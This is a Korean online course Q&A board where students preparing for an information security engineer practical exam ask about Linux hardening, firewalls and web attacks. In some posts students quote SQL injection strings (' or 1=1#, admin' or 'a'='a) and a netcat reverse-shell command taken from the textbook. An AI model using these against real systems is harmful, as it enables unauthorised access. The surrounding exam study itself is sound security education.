2021지안패스 이용 중인데, 2022년 실기 강의와 2021년 실기강의 차의점이 무엇인지 궁금합니다. 2021 강의밖에 없어서 어떤걸 더 준비해야하는지요?

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

박준호 2022-03-27
답변완료

법규

안녕하세요 2022 기출문제에서는 2021 기출문젝와 다르게 법규가 개정되었다고 알고 있는데 저는 2021 기출문제랑 이론서에 법규는 그냥 아예 보지 않고 국가 법령 센터에서 개정된 내용으로만 공부하면 될까요??

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

박인우 2022-03-27
답변완료

실기 최신강의

올해 실기 최신강의는 6강 더 추가 된거 같은데 급해서 21년도꺼 결제해서 보고 있습니다. 뭐가 달라진건가요 올해년도와 작년도 내용하고? 이럴바에 좀 더 기다렸다가 구매 할걸 그랬나봐요...

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

명두희 2022-03-27
답변완료

spf 기술 질문드립니다

선생님 20121 실기 문제에서 송신ip를 송신dns에 질의라고되있는데 여기선 reverse dns 질의를 하는걸까요? ip > 메일 도메인 ex @naver.com 처럼 나오는걸까요?

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

강현중 2022-03-26
답변완료

호스트의 유효범위 문제

도저히 이해할 수 없어서 질문드립니다.

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

주익형 2022-03-25
답변완료

실기문제집 146번의 2)번 문제 문제 질문드립니다.

백업파일 접근권한을 600으로 만들기 위해 umask 설정을 umask066으로 하는것은 알겠는데 그 뒤의 umask 022 설정은 왜 한번 더 쓰는 것 인가요?

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

우성원 2022-03-25
답변완료

강의자료

2021년에 첨부되어있는 자료들과 2022년에 첨부되어 있는 자료들의 내용은 같은 것인가요?? 제가 다운로드 받아봐서는 파일명도 얼추 거의 비슷한 것 같은데요 추가된 파일이 있거나, 동일한 파일명이지만 수정된 내용인 파일이 있을지 궁금합니다.

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

배윤 2022-03-24
답변완료

실기 강의 중 [연습장] 내용

안녕하세요~ 항시 양질의 강의덕분에 도움 받고 있습니다. 다름이 아니고, 2강부터 나오는 [연습장] 내용은 강의자료로 따로 안주시는건가요? 그냥 제가 타이핑해서 하는 수 밖에 없는걸까요??? 제공 안하시는 이유가 별로 중요하지 않아서 일까요?

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

배윤 2022-03-24
답변완료

pwunconv 질문드립니다.

중요한건 아닌 것 같지만 궁금해서 질문드립니다! 일반 패스워드 정책을 사용해도 /etc/login.defs의 pw aging이 사용되는거죠?

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

조은혜 2022-03-24
답변완료

질문

tcp wrapper를 사용할 때 inetd.conf 파일의 실행경로를 /usr/sbin/tcpd라고 한다고 하셨는데, 서비스가 telnet이든 ftp든 상관없이 /usr/sbin/tcpd로 통일인가요?

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

유민서 2022-03-24
답변완료

시험에서 iptables 정책 해석을 이렇게 적어도 될까요?

iptables -A INPUT -p tcp --syn --dport 80 -m connlimit --connlimit-above 5 –j DROP 라는 정책이 있다면, => inbound되는 TCP패킷 중 SYN플래그가 설정되어 있고, 80번포트를 목적지로 하는 모든 패킷에 대해 동일한 IP로부터 동시연결를 5개로 제한하고, 5개 초과시 차단(DROP)한다. 이렇게 적어도 될까요? 그게 아니면 원칙적으로 "inbound되는 패킷 중 tcp프로토콜을 사용하며, SYN플래그가 설정되어 있으며, 80번포트를 목적지로하는 모든 출발지IP를 가진 패킷에 대해, 동일한 IP의 동시연결 개수를 5개로 제한하며, 5개를 초과할 시 차단한다." 라고 적어야 할까요? 둘다 똑같은 의미라 생각이 들지만 -p tcp에 대해서 "inbound되는 TCP패킷 중"이라 적어도 문제가 없는지 궁금하여 질문드립니다.

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

이지환 2022-03-24
답변완료

질문

10강에서 ~가 홈디렉터리를 의미한다고 했는데, 그러면 /와 ~ 둘다 홈디렉터리를 의미하는 것이라고 보면 될까요?

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

유민서 2022-03-23
답변완료

선생님 IPSEC 질문 드립니다

선생님 안녕하세요 실기 책 전송모드 , 터널 모드 둘다 IP Payload 뒤에 IPSec-T(IPSec 트레일러) 그림이 있는데요 상세 프로토콜 설명시 AH 프로토콜 동작 모드 그림에서는 IP Payload 뒤에 트레일러가 빠져있는데 AH로 동작시에는 별도 트레일러가 없는걸까요? ESP에서만 ESP-T 만 존재하는걸까요?

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

강현중 2022-03-23
답변완료

iptables 정책 질문드립니다.

안녕하세요. 강사님 iptables에 대해서 궁금한 게 있어서 질문드립니다. iptables [테이블] [체인] [룰] [타겟]이 기본 구문이라고 나와있는데 해당 구문 자체도 명령어이기 때문에 쉘스크립트에 자동으로 실행되게끔 정의해두는 게 맞을까요? 구글에서 찾아보니 이렇게 나와있어서요. 즉 snort처럼 /etc/snort/rules/local.rules 파일에 rule을 정의하는 것이 아닌, iptables는 명령어로써 rule을 추가하는 걸로 이해했습니다. 따라서 rule을 추가하기 위한 iptables 명령어가 자동화되어 실행될 수 있도록 .sh파일로 정의해두는 걸로 이해했는데 맞을까요? 그래서 iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT 같은 iptables 구문이 실행되면 INPUT체인에 rule이 등록이 되는 거고, INPUT체인에 등록된 rule을 확인하기 위해서는 iptables -L INPUT -n 명령어를 통해 확인할 수 있는 게 맞을까요? snort와 다르게 단순히 구문만 있는 게 아니라 이해하는데 좀 더딤이 있어서 질문드립니다. 꼭 답변 기다리겠습니다.. (요약하면 snort는 설정파일에 rule 구문 작성을 통해 정책 설정, iptables는 iptables명령어로 rule 구문 작성을 통해 체인에 정책 설정이 맞겠죠?)

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

이지환 2022-03-23
답변완료

질문

강사님 ! /etc/profile 모두에게 적용되는 환경 설정 파일이라고 하셨는데 로그인하는 사용자들 다 같은 방식으로 환경 설정 파일이 로드된다는 의미인가요? 설정되는 환경변수는 사용자마다 다른거 맞나요?

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

이소율 2022-03-22
답변완료

미리 준비를 하려다보니 2021 강의를 구매해서 듣는데 새로 업데이트 된 내용을 수강할수는 없나요?

안녕하세요 현재 2021강의를 듣는 중인데 2월부터 준비하려다 보니 2022년 강의가 없어서 2021년 강의를 구매했는데 2022년 강의가 업데이트 되었네요 혹시 2022년 강의 전체를 다 구매하는게 아니라 새로 업데이트 된 부분만 결제를 해서 볼 수는 없나요?

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

최용욱 2022-03-21
답변완료

5강에서 하드링크 질문드립니다.

하드링크는 결국 디스크 상에서의 동일한 하나의 데이터를 inode number를 기반으로 공유하고 있는걸로 알고있는데, 34쪽 그림에서 i-node 블럭 하나가 dataBlock 2개를 가리키고 있어서 헷갈려서 질문드립니다. 하드링크를 만들면 같은 내용의 dataBlock이 하나 더 생기는 건가요? 아니면 파일이 dataBlock 2개에 걸쳐서(나눠서?) 저장되어 있다는 것을 표현한건가요?

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

조은혜 2022-03-21
답변완료

logrotate 질문드립니다.

제가 헷갈리고 있는것 같아서 질문드립니다. p.103쪽에 맨 밑 예시 그림을 예로 질문드리겠습니다. <질문 1.> access_log 파일의 7일치 로그를 access_log-20170305 로그파일에 백업하고 또 access_log 파일의 7일치 로그를 access_log-20170312에 백업하는 식으로 계속 진행하다가 마지막으로 access_log-20170402 로그파일에 백업을 완료해서 총 4개의 백업로그 파일을 채우고나면 그제서야 access_log 파일을 create해서 새로운 access_log 로그파일을 생성하는건가요? <질문 2.> create가 순환시 새로운 로그파일을 생성해준다고 했는데 이 create를 해주는 이유가 궁금합니다. <질문 3.> 교재 p.103쪽 맨 위에 daily, monthly, weekly : 일 단위, 월 단위, 주 단위 로그파일 순환 rotate n : 순환 로그파일의 개수를 n개로 설정 이렇게 설명이 되어 있는데 첫번째 로그파일과 두번째 순환 로그파일은 서로 다른 의미의 로그파일인가요? <질문 4.> 교재 설명에서 순환이라는 개념을 제가 헷갈려 하는것 같은데 정확히 어떤 과정을 순환이라고 하는지 궁금합니다. 예를 들어 rotate = 4 일때, 순환로그파일 개수 4개 만큼의 로그파일에 로그 백업을 완료한 시점이 순환인건지, 순환로그 파일1, 2, 3, 4가 있을 때 순환로그 파일1에 로그를 백업을 완료하고 순환로그 파일 2에 로그를 백업하는 과정을 순환이라고 하는지 정확히 개념을 모르겠습니다. 바쁘신 와중에 질문을 봐주셔서 감사합니다!

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

이승주 2022-03-21
답변완료

강의 ip 인증 관련

안녕하세요. 강의 ip 인증과 관련해서 문의드리고자 합니다. 제가 주말에는 집, 평일에는 기숙사에 생활을 하고 있습니다. 주말에 강의를 결제를 하고 수강을 해서 집 ip로 기기가 인증되어 있는데, ip 인증 기숙사 쪽 디바이스로 변경 요청드리고 싶습니다. 강의 이력을 보시면 아시겠지만, 다 제가 수강했던 이력들입니다. 확인해주시면 감사하겠습니다.

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

김동혁 2022-03-19
답변완료

산업기사관련 질문입니다

필기책의 앞부분에는 단원별 출제빈도가 나오던데 실기책에는 없어서 질문드립니다 기사 시험과 비교해 산업기사 실기시험 준비에 유념해야 할 부분이 있을까요? 가령 출제점위라던지....

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

박성범 2022-03-19
답변완료

연습장 자료는 어디서 다운받을수 있나요?

3강에 나오는 연습장 자료는 어디서 다운받을수 있나요? 아래 다른분도 질문하셨던데요 답변을 열어볼 수 없어서 또 질문하네요...

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

유정희 2022-03-19
답변완료

pam 모듈에 대해서 질문 드립니다.

안녕하세요 pam 모듈 실습중에 궁금한 점이 있어 질문 드립니다. [첫번째 질문입니다.] 예를 들어 root 계정의 원격 접속 제한 실습을 하실때 auth required pam_securetty.so 라고 책에는 기술 되어있는데 취약점 분석 가이드에서는 auth required /lib/security/pam_securetty.so 라고 절대 경로로 지정 되어 있는데 어떠한 차이가 있는 건지요? [두번째 질문입니다.] 책에서는 원격접속 제한시 /etc/pam.d/remote 에서 설정값을 넣어주었는데 취약점 분석가이드 설명에서는 /etc/pam.d/login 에서 설정하도록 되어있는데 버전의 차이인가요 아니면 두 곳다 가능한가요? [마지막 질문] vi 로 편집시 auth [ ] required [ ] pam_tally2.so [ ] <-- 공백을 스페이스로 주면 되는 건지요 기본 설정이 되어 있는 파일은 한칸씩 뛰어져 있지 않고 tab으로 설정되어있는 것처럼 공백처리 되어있어서 문의드립니다. 이상입니다. 감사합니다 ^^

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

최준석 2022-03-19
답변완료

질문

24페이지에서 (2021) 원격에서 인증요청을 할 경우 LSA에서 판단후(원격인지) NTLM의 시도/응답 프로토콜을 이용해 challenge를 보내는 건가요? SAM 이 발급하는 인증 토큰과 DC가 발급하는 접근 토큰은 같은건가요? 어떻게 다른가요? 윈도우 서버는 시도/응답으로 사용자 인증을 한 후 또 DC를 이용해 원격 사용자를 인증하나요?

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

이소율 2022-03-18
답변완료

실기시험 각 회차별 문제 문의

실기시험은 필기시험처럼 각 회차별 문제가 없나요? 교재에 문제집이 있긴하지만 너무 많아서 최근엔 어떤 트렌드로 출제되는지 알고 싶어서요.

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

신현욱 2022-03-18
답변완료

2021실기 문제집 331번 질문드립니다.

331번 3) 공격자(공격근원지)는 누구인가? arp -a 로 캐시테이블 조회시 맥주소가 같은건 192.168.13.1 과 192.168.13.22 로 보입니다. 디폴트 게이트 웨이 주소 192.168.13.1 의 맥주소는 cc-cc-cc-cc-cc-cc 로 보이구요 공격자가 192.168.131.22 라고 단정지을수 있는 근거가 있을까요? 192.168.13.1 맥주소 arp 캐시 테이블도 변조 된걸로 보여서요..

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

강현중 2022-03-18
답변완료

질문

강사님 질문이 있습니다. 2021책(이론,문제)사용해도 되나요? 윈도우 인증에서 사용자가 윈도우 한테 어떻게 인증요청을 하는 건가요? 부팅후 passwd입력하는 것은 인증 요청이 가고 challenge값을 전송 받은후 입력하는 건가요?

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

이소율 2022-03-18
답변완료

연습장 자료 관련

안녕하세요. 3강부터 강사님께서 연습장을 띄워서 강의를 진행하시는데, 어디서 연습장을 다운받을 수 있나요? 확인 부탁드립니다.

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

김동혁 2022-03-18
답변완료

지안패스 2022

지안패스 구매했는데 2022 실기 강의는 새로 사야하는건가요?

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

김주용 2022-03-18
답변완료

강의

바쁘신데 고생많으십니다. 나머지 강의는 언제쯤 올라올까요?

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

정지영 2022-03-18
답변완료

2강 문의

2강 강의 중 연습장이 나오는데 자료가 어디에 있나요?

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

김정길 2022-03-16
답변완료

갤럭시탭 강의 수강이 안돼요

왜 탭으로는 강의 목록이 안보이나요

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

김정길 2022-03-16
답변완료

21년, 22년 실기강의 내용 차이가 큰지요?

21년 실기강의 내용을 보고 있는데 22년 실기강의가 새로 올라온것 같네요. 내용 차이가 많은지요? 22년 실기강의로 다시 봐야할지 고민되서 문의 합니다.

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

조기연 2022-03-15
답변완료

아이패드 강의 어떻게 듣나요

재생이 안되요…

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

김송원 2022-03-15
답변완료

선생님 2022 정보보안기사 실기 대비 강의

전 2021년 강의를 신청해서,, 2022년에 추가된 이메일 보안은 들을수없는건가요?

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

강현중 2022-03-15
답변완료

2022 실기가 나왔는데 2021에서는 실기 추가 강의를 결제 해야되는건가요?

그리고 2021 교재랑 2022 교재는 차이가 많이 심한가요? 개요표를 보니 강의 상당히 달라보였는데

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

우성원 2022-03-15
답변완료

이미 인증된 기기가 있다고 합니다

아마 전에 강의 때 다른 핸드폰이였는거 같은데요 풀어주세요 ㅜㅜ

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

신철민 2022-03-14
답변완료

실기 준비 2022 강의만 들어도 되나요

책은 2022 실기 주문했는데 강의보면 2021,2022 두개 있네요 2022 실기 강의만 들어도 되는건가요?

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

박승래 2022-03-14
답변완료

웹서버 Directory 섹션과 지시자들 이해가 힘들어서 질문드립니다.

안녕하세요. 파일업로드 취약점을 공부 중에 Directory 섹션과 지시자들이 헷갈려서 질문드립니다.. 제가 이해한 걸로는 웹서버 설정을 httpd.conf 파일에만 설정하는 것이 아닌, 개별 디렉터리별로도 설정할 수 있는 걸로 이해가 됩니다. 즉, xinetd데몬처럼 공통적으로 적용되는 설정은 xientd.conf에 적용하고, 개별 서비스에 대한 설정은 xientd.d/telnet 같은 개별 설정파일에 설정하는 것처럼 웹서버도 공통적으로 적용되는 설정은 httpd.conf에 적용하고, 이때 개별 페이지(디렉터리)에 대해 설정을 하고 싶을 때 섹션을 통해서 설정을 적용할 범위를 지정해주고 거기에 이제 지시자를 넣음으로써, 해당 경로를 포함한 하위에 위치한 모든 디렉터리에 대해서 설정이 적용되는 걸로 이해가 됩니다. 맞을까요? 만약 이해한 부분이 맞다면, /var/www/html/home/download라는 디렉터리에 AddType 지시자를 설정하고 싶다면 2가지로 구분할 수 있을 것 같습니다 ◆1. httpd.conf설정파일로 간단하게 설정하기◆ httpd.conf 설정파일에 AddType text/html .php .jsp 로 설정해둬서 /var/www/html/home 하위에 위치한 모든 디렉터리에 대해서 AddType 지시자가 적용되게끔 하거나 ◆2. 액세스파일 설정◆ httpd.conf파일에 AllowOverride All 로 설정해두고 /var/ww/html/home/download 디렉터리에 .htaccess 파일을 생성하여 해당 파일에 AddType 지시자를 넣음으로써 /var/www/html/home/download에 AddType 적용 위 2가지 사항이 어떻게 적용하느냐에 방법에 차이가 있을 뿐 결과적으로 똑같다 생각하는데 맞을까요..? 두번 돌려봐도 이해가 이렇게 되는데 맞는지 아닌지 검색을 해봐도 이해가 힘들어서 이렇게 질문글을 남깁니다. --------------------------------------------------------------------------------------------------------------------------------------------- (여담으로, 만약 FilesMatch 지시자의 경우 .htaccess파일을 통해서 정의할 때 Directory섹션처럼 로 정의하던데 만약 httpd.conf파일에 FilesMatch를 적용한다고 하면 디렉터리 섹션엔 적용 못하고 그냥 httpd.conf파일에 적용해야 하나요? 즉, 이게 무슨 말이냐면 Order allow,deny Deny from all 이렇게는 불가능하고 그냥 httpd.conf파일에 Order allow,deny Deny from all 이렇게 적어서 전체적용을 시켜야 하는건지 궁금합니다. ------------------------------------------------------------------------------------------------------------------------------------------- 아직 이해한 부분이 100% 확신이 드는 것이 아니라 글이 조금 장황해졌습니다 꼭 이해하고 넘어가야 할 부분인데 여쭤볼 분이 선생님밖에 없네요.. 답변주신다면 감사하겠습니다. 문단을 최대한 개행처리로 구분지어서 적긴 했는데 이게 그렇게 보이실지 모르겠습니다..ㅠㅠ 답변 꼭 부탁드립니다.

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

이지환 2022-03-14
답변완료

2022 실기 강의

2021 지안패스로 듣고 있는데 교재는 2022년도를 구매하면 될까요? 그리고 2022 실기 강의는 들을 수 없는 건가요? 추가된 내용이나 이런건 알 수 없는 건가요?

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

최유비 2022-03-14
답변완료

아이패드 강의 재생

아이패드에서 강의가 재생안되는데 시청하는 방법이 따로있나요??

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

김소연 2022-03-14
답변완료

문의

추가된 부분이 있다면 교제도 새로 사야될까요? 2022에서 추가된 부분만 2021강의자료에 돌려주실 수 없나요?

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

박인우 2022-03-14
답변완료

21년 교재로 22년 실기강의 수강해도되나요?

21년 교재로 22년 실기강의 수강해도되나요?

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

김현식 2022-03-13
답변완료

2022 실기 신강의 들을 수 있는지요?

지안패스로 2021 수강 중입니다. 실기 교재는 새로 구입했는데, 아직 기간이 남은 2021 지안패스 수강자는 2022 신강의 수강시에 할인 있을까요? 할인 혜택 있다면 어떻게 신청하는지요? 이전질문에 비슷한 내용 봤는데 답변 열람이 안되서 질문 재차 드립니다.

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

마미리 2022-03-13
답변완료

21년 교재 구매했는데... 이걸로 들어도 되나요?

...22년 교재 이번주에 나왔나보네요 안나오길래 21년 교재 구매했는데.. 이걸로 들어도 되나요?

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

이경호 2022-03-13
답변완료

21년 교재로 22년 강의를 들어도 될까요?

21년 교재를 구매하여 21년 강의를 듣다 22년 강의가 업데이트 되어 22년 강의를 듣고 싶은데 22년 교재를 다시 주문해야 할까요?

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

윤정택 2022-03-13
답변완료

안녕하세요

2021 패스 샀는데 정보보안기사 실기 2022강의는 들을 수 없나요? 강의가 많이 달라졌는지도 궁금합니다. 하ㅇ상 감사합니다.

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

박인우 2022-03-12
답변완료

CSRF는 XSS의 한 종류라고 봐도 될까요?

시험과 크게 관련은 없지만 단순히 개인 호기심에 질문을 드립니다. Stored XSS 공격은 공격자가 악성script를 "취약한 웹서버의 DB"에 저장시켜서, 해당 DB정보를 요청하는 Client가 악성script가 포함된 DB응답을 받음으로써 Client쪽에서 악성script가 동작하는 원리잖아요? 이때 대표적으로 악성script는 "공격자 서버로 쿠키값(세션ID)을 전송"하는 script구문이 있구요. 그런데 CSRF공격의 경우에는 공격자가 악성script를 "취약한 웹서버의 DB"에 저장시키는 것은 동일하지만, 해당 악성script응답을 Client가 받았을 때, Stored XSS공격과 다르게, "탈취"의 목적이 아닌 "변조"의 목적으로써 Client가 요청한 웹서버로 Client의 권한을 가지고 비밀번호 변경 등을 요청하는 악성script가 동작하게 되는 거잖아요? 그럼 이때 차이점은 단순히 "악성script의 구성 방식"에 있는 것 같고 동작 원리는 "Client요청 -> 웹서버 DB응답 -> Client측에서 악성script가 동작 -> 공격자서버로 쿠키값을 담은 HTTP요청 or 요청한 웹서버로 Client 정보변경을 요청하는 HTTP요청" 이렇게 이해가 되는데 따라서 Client가 악성script를 통해 자신도 모르는 새에 발생하는 HTTP요청이 공격자서버로 가느냐, 정상적인 웹서버로 가느냐 차이점으로 보여서 XSS의 공격 부류 중 하나라 생각이 들기도 합니다..ㅎㅎ 포괄적으로라도 구분지을 수 없이 그냥 아예 별개로 구분해야 하는 게 맞을까요 선생님?

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

이지환 2022-03-12
답변완료

침해 사고 유형별 시나리오 질문입니다.

선생님 안녕하세요 2021년 실기책 592 페이지 에서 알기사 사이트 NAT IP ( 10.10.10.3) 이 관리자 PC라는 것인데 그러면 동영상 강의에서 표시해주신 관리자 PC IP 192.168.56.20이 NAT 되어 10.10.10.3 으로 변경되서 통신된다는 것일 까요? 10.X.X.X 대역도 사설IP 인것 같아서, 햇갈려서 여쭤봅니다 ㅠ

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

강현중 2022-03-12
답변완료

21년 교재로 22년 실기강의 수강해도되나요?

21년 교재로 22년 실기강의 수강해도되나요?

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

이효범 2022-03-11
답변완료

Form SQL인젝션 공격 질문하나 드립니다.

안녕하세요 Form SQL인젝션 공격 중에 궁금한 점이 있어서 질문을 남깁니다. 어느정도 검색을 통해서 해결은 됐지만, 검색해도 모르겠는 부분이 있어서 질문드려요 ' or 1=1# 처럼 후행조건을 주석처리하고, or과 참조건을 넣음으로써 해당 조건절이 무조건 참이되게끔 해서 테이블에 있는 레코드들을 비교했을 때 모두 참이 되게끔 만들잖아요? 그런데 이제 참으로 만드는 조건이 주석을 쓰지 않고도 가능한데 대표적인 예시가 ' or 'a'='a 인 걸로 알려주셨습니다 이때 뒤에 password가 맞지 않으면 안 되는 거 아닌가 싶었는데 DB는 and연산이 우선이 된다고 하길래 이해했습니다. 그런데 여기서 궁금한 점이 있네요 ' or 'a'='a 를 입력한다 했을 때 id='' or 'a'='a' and pass='1234'라고 한다면 id='' or ('a'='a' and pass='1234') 이렇게 묶이게 될거고, 괄호 and연산은 거짓이기 때문에 id='' or 거짓조건 이렇게 될텐데 id='' 이 해당 조건이 참인 조건이 되는 건가요? 제 생각으로는 만약 id=''조건이 참이라면 굳이 or 1=1을 쓰지 않을 테니 절대 참은 아니라 생각하는데 그래서 제가 생각하기에는 ' or 'a'='a 는 모든 레코드에 대해서 참인 조건절을 만들지 못하고 특정한 id필드값에 대해서만 참으로 만드는 거 같은데 맞을까요? 가령 admin' or 'a'='a를 넣게 된다면 id='admin' or 'a'='a' and pass='1234'가 되고, id='admin' or ('a'='a' and pass='1234') 이렇게 and연산부터 묶여서 id='admin' or 거짓조건이 되는데, admin이라는 계정이 해당 테이블에 있다면 그 admin이라는 계정에 대해 참인 조건이 되는 거라 생각이 듭니다 제가 생각하는 부분이 맞을까요? 맞다면 따라서 ' or 'a'='a는 이해를 돕기위한 의미없는 문장인 거 같은데 이것도 맞을까요? ' or 'a'='a를 쓰려면 반드시 계정명을 앞에 입력해서 admin' or 'a'='a 이런식으로 써야하는 거 같다고 생각이 들어서요... 답변 부탁드립니다 ㅠㅠ 직접 MySQL로 실습을 해보니 맞는 것 같습니다. id=''는 필드값이 NULL이라 그런지 Empty 결과가 도출되고 id='admin'처럼 넣으니 후행 패스워드 조건은 무시되네요. 실습결과가 이렇게 나오는데 이론적으로도 당연히 질문한 내용이 맞겠죠 선생님..?ㅠ

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

이지환 2022-03-08
답변완료

침해 사고 유형별 시나리오 질문입니다.

선생님 안녕하세요 침해 사고 유형별 시나리오의 공격 시나리오 2021년 실기책 기준 291페이지 main3.php 코드중 REMOTE_ADDR 함수를 써서 알기사 사이트 NAT IP(10.10.10.3) IP 에서 접속 을 하게 되면 iframe 추가 되도록 유도 하는 코드가 있는데요 10.10.10.3(알기사 웹서버 IP) 접근하는 사용자에게 유포지로 리다이렉트 하는 악성스크립트 라고 되어있는데요 , 여기서 10.10.10.3 (알기사 웹서버 IP) 인 이유는 알기사 웹페이지에 iframe 태그 키위쇼핑몰 웹서버(mall.kiwi.99.com)으로 리다이렉트 하는게 담겨져 있어서 최초 경유지인 알기사 웹서버 10.10.10.3 에서 접근 하는 것이 되는 걸까요? 즉 알기사 웹서버(10.10.10.3) -> 키위쇼핑몰 -> 유포지 wow.102.com 에서 키위쇼핑몰 관점에서 REMOTEADDR은 알기사 웹서버 에 포함되어있는 iframe 값 태그 호출을 결국 알기사 웹서버에서 하는 것이기떄문에 10.10.10.3 이 된다 가 맞을까요? 질문2) 실습 과정중 칼리 리눅스 (10.10.10.10 4321 핸들러) 에서 -> 10.10.10.3:51511 로 세션 설정하는 것이 보이는데요 10.10.10.3 은 알기사 웹서버 IP가 아닌가요? 윈도우 XP 에 리버스쉘을 연결 하는게 알기사 웹서버 IP 인지 , 관리자 PC IP (10.10.10.3) 인것인지 모르겠씁니다 ㅜ 강의 에서는 192.168.56.20 이 관리자 PC(Windows XP) 로 되어있는데요.. p.s 게시판 가독성이 너무 안좋아서 txt 파일로도 질문 올립니다!

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

강현중 2022-03-07
답변완료

현재 구강의 청강중입니다. 신규강의 나왔을 때 부분적 구매가 가능할까요?

아무래도 학생이다보니 금전적으로 부담이 되는 상황인데 미리 미리 공부해두기 위해 3.7일 신규강의 이전에 강의를 구매해서 공부하고 있습니다. 년도가 바뀌어서 업데이트가 된 줄 알았는데 제가 확인을 못했었나봐요 혹시 업데이트된 인강이 나오면 일부분만 변경되고 나머지 강의들은 똑같을 거 같은데 업데이트 된 부분만 별도의 비용을 지불해서 업데이트시킬 순 없을까요?

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

이지환 2022-03-06
답변완료

파일 업로드 취약점에 질문 있습니다.

안녕하십니까 질문이 있습니다. 1. content-type 필터링을 통한 방어는 Burp Suite를 통헤 변조가 너무 쉬워 취약합니다. 2. 파일 확장자에 대한 White lIst 대응 코드를 추가 한다고 강의를 듣고 궁금한 점이 있습니다. 질문 : 여기서 해커가 webshell.php 파일을 webshell.jpg 파일로 변경을 하고 업로드를 하면 서버에 업로딩 되는거 아닌가요? 하지만, 해커가 php 파일을 실행하지 못해서 안전하다고 볼 수 있는 건지요??? 질문의 핵심은 파일 확장자를 변경하고 올리는 경우는 서버 사이드에서 파일을 실행하지 못하더라도 Client 로 배포를 해서 악용할 수 있지 않을까라는 궁금점이 있습니다.

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

진규보 2022-03-05
답변완료

HTTP GET Flooding 공격에 대해 질문드립니다.

TCP SYN Flooding이나 UDP Flooding 공격들은 DDoS 공격으로 출발지 IP 가 다양한데 HTTP GET Flooding 공격은 다량의 동일한 HTTP GET 요청만 올뿐 출발지 IP는 동일한가요?

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

우성원 2022-03-03
답변완료

DoS의 Smurf 어택과 DDos의 ICMP 공격의 차이점이 궁금합니다.

Smurf 공격은 출발지 IP를 희생자의 IP로 목적지IP를 증폭 네트워크의 broadcast 주소를 기입하여 서비스 마비를 일으키고 ICMP공격은 다량의 ICMP 패킷을 서버로 전송하여 서비스를 원할하지 않게 하는 공격인데, 공격자 관점에서는 둘다 echo request가 대량으로 발생할텐데 두 가지 공격을 구분할 수 있는 방법이 무엇인가요?

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

우성원 2022-03-02
답변완료

침해 사고 분석 및 대응의 리버스쉘 질문입니다.

선생님 안녕하세요. 질문있어서 게시글 남깁니다. 책 페이지 540 쪽 리버스쉘을 이용하여 서버->클라이언트로 리버스쉘 접속 명령어 부분설명에서 이해가 안가느데요 nc 10.10.10.10 80 -e /bin/bash 명령어가 잘 이해가 가지 않습니다. 클라이언트에서 nc -lvp 80으로 리스닝 프로세스를 하나 열어 두고 , 서버에서 클라이언트로 접속을 한다 (nc 10.10.10.80) 까지의 명령 어 흐름이고 그 뒤에 나오는 -e /bin/bash 관련 옵션 질문입니다. -e 즉 , exec nc 커넥터의 실행 이미지를 bash 프로세스 실행 이미지로 exec 전이한다 라는 표현을 썻는데.. 질문 1) 이 전이 한다는 표현이 bash 프로세스 실행 프로그램으로 덮어 쓴다로 이해해도될지요? 질문 2) 실행 이미지만 교체되고 nc 커넥터가 오픈한 파일리스트 는 그대로 복제 된다. 여기서 이 복제라는게 도통 잘 모르겠습니다. nc커넥터가 실행되고 생성한 파일리스트에 배쉬프로세스가 전이되고 배쉬프로세스가 생성되면서 기존에 생성한 nc커넥터가 생성한 파일리스트를 배쉬 가 생성한 파일리스트로 복제를 하는것인지.. 복제가 어디서 어디로 되는건지 잘 모르겠습니다.

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

강현중 2022-03-02
답변완료

Sequence Number관련 질문드립니다

